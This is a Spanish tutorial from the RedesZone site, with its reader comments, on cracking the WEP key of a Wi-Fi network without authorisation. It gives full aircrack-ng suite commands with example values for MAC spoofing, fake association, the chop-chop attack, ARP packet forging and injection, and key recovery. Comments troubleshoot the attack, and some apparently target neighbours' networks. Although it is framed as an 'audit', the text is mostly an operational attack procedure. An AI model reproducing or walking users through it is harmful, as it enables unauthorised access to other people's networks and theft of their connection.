Cómo Hackear una red WiFi sin clientes conectadosEste manual está orientado para generar tráfico cuando no hayningún cliente asociado al punto de acceso (o red wifi), (si nohay clientes no hay tráfico), es un ataque que una vez hechogenera mucho tráfico, pero no siempre funciona con todas lasredes wifis. Una vez aclarado esto podemos empezar (heutilizado Wifiway 1.0 Final) .
Lo podéis descargar desde la página web oficial.
Cambiar la MAC de nuestra tarjeta wireless:
Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0
Ponemos la tarjeta en modo monitor para poder coger los paquetes
Como en el anterior manual dijimos…
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Abrimos airodump para apuntar canal, bssid y el ssid
Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor,apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.
Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.
Nos asociamos a la red wifi (Asociación Falsa)
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Adaptadores WiFi
Bancos de Prueba
Cámaras IP
Módems 3G
PLC
Puntos de Acceso(AP)
ReproductoresMultimedia y NAS
Routers
Alfa Network
ASUS
Cisco Linksys
Comtrend
D-Link
Devolo
FRITZ!
Huawei
HP
Kaiboer
Oceans
Orange Livebox
Sitecom
TP-LINK
TRENDnet
Zaapa
Western Digital
ZyXEL
Android
Bugtraq
Curso de Redes
Curso Java
Curso PHP
Fabrica tu FreeNAS
GNU-Linux
IPFire
IPsec
Mac Os X
Raspberry PI
Redes
Seguridad Informática
Software
Windows
Firmware Tomato RAF
Firmware DD-WRT
Firmwares Comtrend
Firmwares Zyxel
Análisis de producto
Fabricantes
Tutoriales de ayuda
Firmwares
¡Síguenos!
Portada Android Banda Ancha Pepephone ADSL Bittorrent Redes Seguridad Informática Software
BuscarRouters Redes Inalámbricas WiFi AC Puntos de Acceso PLC Java PHP Firmwares Manuales Test de Velocidad
Me gusta 3679 Seguir a Seguir a @redeszone@redeszone 4,868 seguidores ¿Nos sigues? 1.083
converted by Web2PDFConvert.com
Lanzamos el ataque chop chop
Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismoque el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso(tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro conextensión .XOR.
Suscríbete a nuestro RSS
Me gusta A 3679 personas les gusta esto. Regístrate
Seguir a Seguir a @redeszone@redeszone 4,868 seguidores
Redes Zone en
+1.083
Seguir a
Lo que comparten tus amigos
Regístrate Crea una cuenta o Entrar para ver lo que hacen tus amigos.
Cómo eliminar una cuenta de WhatsApp de forma completaSé el primero de tus amigos en recomendar esto.
Sigue en tiempo real los ataques informáticos con Digital Attack Map196 personas han recomendado esto.
Plug-in social de Facebook
converted by Web2PDFConvert.com
No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos…
Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnoseste paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
converted by Web2PDFConvert.com
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y ossaldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.
Fabricar paquete ARP para inyectarlo
Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar ypegar del terminal abierto de antes) -w NOMBRE PAQUETE
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete
Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete wlan0
converted by Web2PDFConvert.com
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan,yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 yno tuve ningún problema.
Esperar a que haya suficientes IVs
Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta unnúmero decente.
Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave lapodrá sacar aircrack).
Ejecutamos Aircrack-ng para conseguir la clave
Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:
aircrack-ng captura-01.cap
converted by Web2PDFConvert.com
TwittearTwittear
1 0
Tenéis que poner el nombre de la captura que habéis puesto anteriormente en el airodump, si no os acordáis o habéiscerrado, iros a /root y ahí veréis el archivo .cap, tomáis nota de su nombre y lo ponéis.
En pocos minutos tendréis la clave.
Fijaos la diferencia de IVs y el corto espacio de tiempo, en 8 minutos, hemos captado más de 250.000 IVs.
Cuando HAY clientes conectados No-Chop-chop
Si la red wifi tiene un cliente asociado lo mejor es hacer la re-inyección de paquetes ARP, es igual que el chop-choppero no hay que trabajarlo tanto para forjar el paquete etc.
Re-inyección de paquetes ARP:
aireplay-ng -3 -b BSSID -h MAC DEL CLIENTE ASOCIADO [interfaz]
Ejemplo:
aireplay-ng -3 -b 00:02:CF:69:69 -h 00:02:CE:11:11 wlan0
No tiene por qué ser instantáneo, esperad un poco, unos 4 o 5 minutos sería más que suficiente, os digo lo mismoque antes, algunas veces este tipo de ataques no funcionan con determinados puntos de acceso o redes wifi.
Últimos comentarios sobre este manual
Suerte con este método para conseguir tráfico, ya que a veces no sale a la primera, y ni tan siquiera siempre sale…depende del punto de acceso.
Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable), esperad hasta llegar a un millóny medio y lo hará (y si no sale, ponlo en el foro a ver qué está pasando).
Con esto terminamos la auditoría wireless con cifrado WEP, espero que os haya sido útil, y sobre todo, que os hayáisdivertido tanto como nosotros.
Compártelo. ¡Gracias!
107 comentarios
Deja un mensaje...
El mejorEl mejor ComunidadComunidad
• Responder •
alquimis • hace 2
días
Aqui podeis ver lo que pasa cuando se atacan las redes wifi de otros: http://www.canarias7.es/articu...
• Responder •
Jo • hace un
año
Realmente algo demasiado largo y muchos pasos para una simple clave WEP, prefiero hacer esta cantidad de pasos para una WPA o WPA2con el backtrack... con Beini hago lo mismo en 3 pasos y hace todo solo, de todas maneras se agradece el aporte
• Responder •
Miguel Torres • hace 3
meses Jo
es que es largo xq este tema es "sin clientes conectados", si hubieran conectados pffff en menos d 1 minuto sale ;) hay q leer biencompadre
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
1
Like
converted by Web2PDFConvert.com
• Responder •
Jo año
Realmente algo demasiado largo y muchos pasos para una simple clave WEP, prefiero hacer esta cantidad de pasos para una WPA o WPA2con el backtrack... con Beini hago lo mismo en 3 pasos y hace todo solo, de todas maneras se agradece el apore
• Responder •
jorge • hace un
año
man tengo un problema con el chop chop tengo una captura de la pantalla de wifi way 3.4
• Responder •
Angelo • hace un
año
Alguna solución para cuando crea solamente el .cap y no el .xor?
• Responder •
Sergio De Luz • hace un
año Angelo
Debe crearte los dos, sino el ataque no está bien hecho (o bien, ha salido mal).
• Responder •
Eyus • hace un
año
primero que nada gracias por el aporte, pero como quito la wlan0 de modo monitor, existe una manera para parar ese proceso¿? amitampoco me deja usar el sudo su... gracis
• Responder •
IDAT • hace un
año Eyus
iwconfig wlan0 mode managed
Con esto estas poniendo tu interfaz wlan0 en mode administrador (el modo por defecto y el que deseas).
Como un adicional :
Si has iniciado modo monitor de esta manera : airmon-ng start wlan0 se ha creado una interfaz llamado mon0 ,para detenerla : airmon-ng stop mon0.
• Responder •
Juan • hace un
año
funciona con aircarck - ng para windos
• Responder •
Yagami • hace un
año
Yo tengo problemas para la autentificacion, he probado desde feeding bottle hasta backtrack, ni con las herramientas automaticas ni con loscomandos logra autentificarse, solo se la pasa mandando el mensaje "Sending Authentication request (Open System)" y despues de un ratome sale "authentication unsuccefull" y algunas recomendaciones.. alguien me hecha una mano??
• Responder •
Diego • hace un
año
Hola tengo un ALFA AWUS036EW Con CHIPSET REALTEK RTL8187L USB .. y qiero auditar una red WIFI WEP de Speedy pero no tieneclientes.. hice todo el prodecimiento este qe detallas vos pero cuando llego a .. Lanzamos el ataque chop chopAhora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
me crea el archivo .CAP pero no sigue con el .XOR y me aparece el error ese : THE CHOPCHOP ATTACK APPEARS TO HAVE FAILED.POSSIBLE REASONS : .. ETC qe podra ser?? ..con el BEINI tampoco pude.. ya no se qe mas hacer! tengo buena señal todo..me podriasayudar? MUCHAS GRACIAS! .
• Responder •
lol • hace un
año
gracias por el tuto,pero me perdi desde la parte de "Este manual"
• Responder •
wilmer • hace un
año
saludos y exitos, saben deseo saber la ip de la wep descriptada como lo encuentro para conectarme a la red y internet
Paco • hace un
año
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
converted by Web2PDFConvert.com
• Responder •
Se que es una tonteria pero seria para gastar una broma/escarmiento.
Seria posible entrar de alguna manera a una wifi abierta con el mac restriction mode en enable y ninguna mac puesta en la seccion macadress. El router thomson permite hacer esto.
Gracias equipo adslzone.
• Responder •
greenpeans • hace un
año
tengo un problema par ala asociacion con la AP o la Essid tiene espacios ahi como se le hace por ejemploinfinitum 852
• Responder •
8wolf2 • hace un
año greenpeans
Hola greenpeanuts es muy simple solo debes poner comillas simples: 'infinitum 852' si o llegara a funcionar intenta con las dobles:"infinitum 852"
• Responder •
Jhosep • hace un
año
Saque la contraseña de varias wep pero cuando pongo la contraseña no me conecto y en otras me sale CONECTIVIDAD NULA, QUISIERASABER a que se debe esto ah los clientes tienen nombre y numero de cel.ejemplo:COMENTARIO S/50.00 999985754
• Responder •
Luz • hace un
año
Vale para claves Wpa?
• Responder •
Sergio De Luz • hace un
año Luz
No, solo claves wep
• Responder •
Julio • hace un
año
Hola estoy leyendo sus comentarios pero no logro entener como hacer porque corro el aireplay-n y me aparece la pantalla pero al segundose me borra y no me djea ver nada, tambien me ha pasado que el sistema pide que instale el JAVA, (no cual es) yo tengo XP instaldao mepodrias ayudar con algun tutorial donde pueda ver paso a paso como hacer, Grasica y Saludos a todos.
• Responder •
Oubli • hace 2
años
Hay procesos mas cortos y mas efectivos explicados en video en YouTube... Googlenlo.
• Responder •
jose • hace 2
años
por que me sale todo pero siempre tengo problemas con el archibo.xor me sale el archibo cap pero no el .xor tengo barios programas perosiempre cuando le aprieto la (y) todo estabien pero no me sale el archibo .xor y dise los problema plis ayudenme es que me inporta mucho si me ayudan se los agradesco
• Responder •
fitman • hace 2
años
se puede resetear un ap sin estar fisicamente serca de el osea con software y sin tener que utilizar el boton de reset que traen los ap
• Responder •
arias • hace 2
años
hola solo t recomiendo aserlo como bideo es mas fasil
• Responder •
beny • hace 2
años
hola sergio de luz me podrias decir si hay algun video con los pasos que as hecho tu ?
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
converted by Web2PDFConvert.com
• Responder •
lirico años
hola no pude asociarme con el ap de la red pero esperando un poco mas pude sacar la clave me aparece el google pero no puedo navegar, haciendo en cmd un ipconfig /all para ver la ip que me asigno y la puerta de enlace que me quiero colgar no sale nada , cual seria la forma de saber la ip del moden si ya se tiene la clave , me parece que el moden esta con eldhcp desaptivado o puede ser que mi vecino tambien le echo letra a filtracion mac del moden .. hay unamnera de saber la ip del moden
• Responder •
Barracuda713 • hace 2
años
"Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable)" ????????
Parece que no has tienes mucha practica:- Para clave de 5 digitos necesitas solamente un aproximado de 20 000- Para clave de 13 digitos necesitas mas o menos 50 000
Probado con Wifiway 2.0.1Saludos.
• Responder •
Sergio De Luz • hace 2
años Barracuda713
Y de 26 dígitos la clave qué?
• Responder •
julian • hace 2
años
yo tengo un adaptador KOZUMI K-500MWUN es compatible con este programa porque con el backtrack4 no es compatible
• Responder •
Alberto • hace 2
años
Hola,No puedo para de fijarme que en el momento que atacabas al AP, hay un 50% de posibilidades de tuviese un cliente un cliente conectado,solo hay 2 puntos de acceso que empiezan por: 00:1A: y solo el tuyo recibe datas así que creo que había un cliente en el momento delataque.
• Responder •
dan • hace 2
años
yo no puedo pasar del primer paso yo escribomacchanger -m 00:11:22:33:44:55 wlan0y no me funciona me dice esto current MAC: 00:19:7e:66:7a:51 (unknown)ERROR: can`t change MAC: interface up or not permission: Device or resurce busy
• Responder •
Sergio De Luz • hace 2
años dan
Estás usando esa tarjeta o no lo haces con permisos de root.
• Responder •
Evan • hace 2
años
Estoy muy agracecido. es un excelente y muy completo tutorial, hasta este momento no habia encontrado la manera de generar #Data sinclientes conectados.Lo aplique modificando algunas cosas y es sorprendente la velocidad con la que genera #Data.Gracias Funciona al 100%
• Responder •
elen • hace 2
años
Hola Sergio ,puedo hacerlo y para windows xp en un ordenador hp para redes wlan?gracias
• Responder •
Jp • hace 2
años
Sin un cliente asociado mas que tu solo ( previamente realizado con el ataque de falsa autenticacion) es mas efectivo usando el ataque -4que haciendo solamente el ataque -3 o -2?
• Responder •
David • hace 2
años
Este manual sirve para claves wpa tkip? Con lo de archivo de salida te refieres a darle nombre a una crear? Graciasss
David
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
converted by Web2PDFConvert.com
• Responder •
Sergio De Luz No, no sirve, solo WEP.
• Responder •
David • hace 2
años
Hola me podías decir q se de poner en el apartado nombre captura? Cual es la captura? Lo siento soy novato muchas gracias un saludo.
• Responder •
Sergio De Luz • hace 2
años David
El nombre del archivo de salida... El que quieras
• Responder •
David • hace 2
años Sergio De Luz
Perdoname pero no se cual el nombre de del archivo de salida? Ni idea ponme un ejemplo por favor soy un zoquetemuchísimas gracias
• Responder •
Sergio De Luz • hace 2
años David
Tienes puesto un ejemplo...
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
• Responder •
gabriel • hace 2
años
consigo todo los pasos pero solo me deja llegar a 250 000 ivs y luego fallo de " fwrite failed " espacio insuficiente.Que hacer ? Uso vmware y wifiway 1 final
• Responder •
cesar • hace 2
años
hey, tengo el mismo problema de ZeyKar, ya hice todo al pie de la letra pero siempre me sale Waiting for beacon frame (BSSID: xxxxxx) on chanel -1mon0 is on channel -1, but the AP uses channel 9.
no se si tiene algo que ver la tarjeta ya que cuando la mando a modo monitor me sale una tarjeta "virtual" mon0, obviamente yo le cambio la MAC a mon0 y no a Wlan0 y sigo todo el tutorial hasta el problema arriba mencionado.
cuando hago lo de "airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]"me sale "channel 9 [elapsed: x mins] [fecha] [fixed channnel mon0: -1]"lo de fixed channel mon0 : -1,en las capturas no sale. sera ese sea el problema?
asi que ojala pudas ayudarme
• Responder •
Sebastian • hace 2
años
Hola. Buen tutorial pero me sale lo mismo que a varios...
"Failure: got several deauthentication packets from the AP - try running another aireplay-ng with attack "-1" (fake open-systemauthentication)" Que puede ser ?
• Responder •
jorge • hace 2
años
hola disculpa pero de esa forma tambien trabaja en windows xq yo tengo es windows xp pero no se como hacerlo con ese programa ya queno me aparece nada de lo que dices para windows.. por el comando ejecutar lo puedo hacer espero tu respuesta gracias de ante mano..tremendo tutorial
• Responder •
Sergio De Luz • hace 2
años jorge
El manual está hecho para WifiWay o WifiSlax, nunca lo he intentado en Windows :)
luis • hace 2
años
Creo que muchos igual que yo tuvieron o tienen el problema de que no se les creo el paquete .xor CREO (notese que lo puse enmayúsculas) es por el chipset de la tarjeta de red que usan, en el ejemplo que colocan y si ven la imagen es una realtek 8187 el chipset esrtl8187, yo batalle y jamas de los jamases pude con mi atheros AR9285, todo me iba bien, de lo mejor asta llegar a ese paso y sin importarque hiciera jamas saque el paquete, ahora, yo tenia una antena wifi externa la cual le vendí a mi hermano (realtek 8187, sobra decir elchipset pero por si acaso rtl 8781), se la pedi prestada unicamente para ver si ese era el problema y lo consegui, unicamente que lo ise conwifiway 2.0.3 y en pasos mas sencillos (pero igual si hacen los pasos que les dan en el ejemplo lo lograran, al fin que el proceso es el mismo),solo que como lo ice yo fue sin tanto comando no abrir tanta terminal, pero finalmente pude inyectar, ahora me queda una duda gigante,
Compartir ›
Avatar
Compartir ›
Compartir ›
Compartir ›
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Avatar
Compartir ›
Compartir ›
Avatar
converted by Web2PDFConvert.com
Acerca de NosotrosContactoPublicidadAviso Legal
ComunicaciónFacebookTwitterGoogle+Google CurrentsRSS
Grupo ADSLZoneADSLZoneADSLZone TVAndroidAyudaGamerZonaHardZoneRedesZoneSoftZoneSmartZonaTabletZonaTest de Velocidad
RedesZone © 2010 - 2013
Mostrar más comentarios
• Responder •
porque puedo con otras redes, la gran mayoria, exepto mi modem, sera porque es un modem y esta conectado a un router, quiero aclararque soy novato y no se mucho de esto, pero, sigo sin poder con mi modem, a pesar que hago lo mismo que con otras y nomas no puedo,yo no compre el router, así me conectaron el internet y aunque e revisado las configuraciones del router no hay nada sospechoso, mmm¿que pudiera ser?, lo que pudiera ser bueno es que es casi imposible que lo hackeen y me roben el internet, aunque no faltara el que sepamucho mas y lo logre
• Responder •
fernando • hace 2
años
*Al principio dices que hay que cambiar la MAC de la tarjeta y luego dices que es una MAC falsa, entonces, ¿al cambiar la MAC realmente lacambia?, y si es así ¿luego puedo volver a la anterior MAC?.* que es IP del RANGO? y ¿como lo consigo?
• Responder •
Sergio De Luz • hace 2
años fernando
Sip, cambias la MAC real por una inventada = MAC Falsa. Sí, realmente cambia la MAC vía software. Volverá a tener la misma MACuna vez reiniciado el ordenador.
Si la IP del router es 192.168.1.1, y teniendo en cuenta que la maścara de subred siempre es 255.255.255.0 el rango iría desde:192.168.1.2 a 192.168.1.253 :D
Suscríbete Add Disqus to your site
Compartir ›
Avatar
Compartir ›
Compartir ›
Las cookies permiten ofrecer los servicios de RedesZone. Al utilizarnuestros servicios, aceptas el uso que hacemos de las cookies.
Cerrar
converted by Web2PDFConvert.com
RedesZone © 2010 - 2013
converted by Web2PDFConvert.com